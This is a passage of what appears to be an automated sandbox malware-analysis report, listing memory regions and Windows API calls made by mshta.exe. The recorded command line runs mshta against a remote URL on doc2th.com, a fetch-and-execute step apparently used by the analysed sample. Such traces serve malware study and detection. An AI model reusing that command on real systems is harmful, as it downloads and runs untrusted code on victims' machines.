end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 530 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 531 start_va = 0x73a90000 end_va = 0x73a9ffff entry_point = 0x73a90000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 532 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 533 start_va = 0x73a60000 end_va = 0x73a71fff entry_point = 0x73a60000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 534 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 535 start_va = 0x73a50000 end_va = 0x73a57fff entry_point = 0x73a50000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 536 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 537 start_va = 0x74b20000 end_va = 0x74b25fff entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 538 start_va = 0x560000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 539 start_va = 0x73280000 end_va = 0x732b7fff entry_point = 0x73280000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 540 start_va = 0x1f40000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 541 start_va = 0x6f530000 end_va = 0x6f589fff entry_point = 0x6f530000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 542 start_va = 0x2020000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 543 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 544 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 545 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 546 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 547 start_va = 0x75570000 end_va = 0x75572fff entry_point = 0x75570000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 548 start_va = 0x2240000 end_va = 0x233ffff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 549 start_va = 0x72270000 end_va = 0x7227afff entry_point = 0x72270000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 550 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 551 start_va = 0x2430000 end_va = 0x252ffff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 552 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 553 start_va = 0x6e2d0000 end_va = 0x6e2d7fff entry_point = 0x6e2d0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 684 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 685 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 686 start_va = 0x17c0000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 687 start_va = 0x726e0000 end_va = 0x7271bfff entry_point = 0x726e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 688 start_va = 0x540000 end_va = 0x540fff entry_point = 0x540000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 689 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 690 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 691 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 692 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 693 start_va = 0x6d270000 end_va = 0x6dceffff entry_point = 0x6d270000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 694 start_va = 0x580000 end_va = 0x581fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 764 start_va = 0x1390000 end_va = 0x13a0fff entry_point = 0x1390000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 765 start_va = 0x2530000 end_va = 0x2922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002530000" filename = "" Region: id = 766 start_va = 0x2940000 end_va = 0x2a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 767 start_va = 0x2b90000 end_va = 0x2c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 768 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 769 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 770 start_va = 0x6e8c0000 end_va = 0x6e971fff entry_point = 0x6e8c0000 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 771 start_va = 0x71f90000 end_va = 0x71fb0fff entry_point = 0x71f90000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 772 start_va = 0x71680000 end_va = 0x71691fff entry_point = 0x71680000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 773 start_va = 0x71b50000 end_va = 0x71b79fff entry_point = 0x71b50000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 774 start_va = 0x13b0000 end_va = 0x13bbfff entry_point = 0x13b0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 775 start_va = 0x2d60000 end_va = 0x2e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 776 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 777 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 778 start_va = 0x13c0000 end_va = 0x13c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013c0000" filename = "" Region: id = 779 start_va = 0x71220000 end_va = 0x7126bfff entry_point = 0x71220000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 780 start_va = 0x13d0000 end_va = 0x13d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013d0000" filename = "" Region: id = 781 start_va = 0x6d030000 end_va = 0x6d267fff entry_point = 0x6d030000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 782 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 783 start_va = 0x73d70000 end_va = 0x73efffff entry_point = 0x73d70000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 784 start_va = 0x6ee80000 end_va = 0x6eeadfff entry_point = 0x6ee80000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 785 start_va = 0x13e0000 end_va = 0x13e3fff entry_point = 0x13e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 786 start_va = 0x1840000 end_va = 0x1840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001840000" filename = "" Region: id = 787 start_va = 0x1850000 end_va = 0x1853fff entry_point = 0x1850000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 788 start_va = 0x1960000 end_va = 0x1984fff entry_point = 0x1960000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 789 start_va = 0x19f0000 end_va = 0x1a1ffff entry_point = 0x19f0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 790 start_va = 0x1ed0000 end_va = 0x1f35fff entry_point = 0x1ed0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 791 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 792 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 793 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 804 start_va = 0x2a90000 end_va = 0x2b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 805 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 806 start_va = 0x2c90000 end_va = 0x2e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 807 start_va = 0x2e20000 end_va = 0x374ffff entry_point = 0x2e20000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Thread: id = 18 os_tid = 0xa1c [0024.592] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x40fa84 | out: lpSystemTimeAsFileTime=0x40fa84*(dwLowDateTime=0x92b937d0, dwHighDateTime=0x1d3799e)) [0024.592] GetCurrentProcessId () returned 0xa18 [0024.592] GetCurrentThreadId () returned 0xa1c [0024.592] GetTickCount () returned 0x157cf [0024.592] QueryPerformanceCounter (in: lpPerformanceCount=0x40fa7c | out: lpPerformanceCount=0x40fa7c*=336616648) returned 1 [0024.592] GetModuleHandleA (lpModuleName=0x0) returned 0x2b0000 [0024.592] GetStartupInfoA (in: lpStartupInfo=0x40f990 | out: lpStartupInfo=0x40f990*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mShta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0024.592] GetVersionExA (in: lpVersionInformation=0x40f9e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x40f9e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0024.593] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c10000 [0024.593] GetProcAddress (hModule=0x76c10000, lpProcName="FlsAlloc") returned 0x76c6418d [0024.593] GetProcAddress (hModule=0x76c10000, lpProcName="FlsGetValue") returned 0x76c61e16 [0024.593] GetProcAddress (hModule=0x76c10000, lpProcName="FlsSetValue") returned 0x76c676e6 [0024.593] GetProcAddress (hModule=0x76c10000, lpProcName="FlsFree") returned 0x76c61f61 [0024.593] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.593] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.593] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.594] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x7526726b [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.597] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.597] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.597] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.597] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.597] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.597] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.597] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.597] GetStartupInfoA (in: lpStartupInfo=0x40f914 | out: lpStartupInfo=0x40f914*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mShta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0024.597] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0024.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0024.597] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0024.598] SetHandleCount (uNumber=0x20) returned 0x20 [0024.598] GetCommandLineA () returned="mShta http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC" [0024.598] GetEnvironmentStringsW () returned 0xff1b8* [0024.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1059, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1059 [0024.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1059, lpMultiByteStr=0x550e78, cbMultiByte=1059, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1059 [0024.598] FreeEnvironmentStringsW (penv=0xff1b8) returned 1 [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetACP () returned 0x4e4 [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f8ec | out: lpCPInfo=0x40f8ec) returned 1 [0024.598] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f3b8 | out: lpCPInfo=0x40f3b8) returned 1 [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x40f348 | out: lpCharType=0x40f348) returned 1 [0024.598] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0024.598] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x40f138, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏+Ā") returned 256 [0024.598] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏+Ā", cchSrc=256, lpCharType=0x40f3cc | out: lpCharType=0x40f3cc) returned 1 [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0024.598] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0024.598] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x40f0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā") returned 256 [0024.598] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0024.599] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā", cchSrc=256, lpDestStr=0x40eec8, cchDest=256 | out: lpDestStr=" 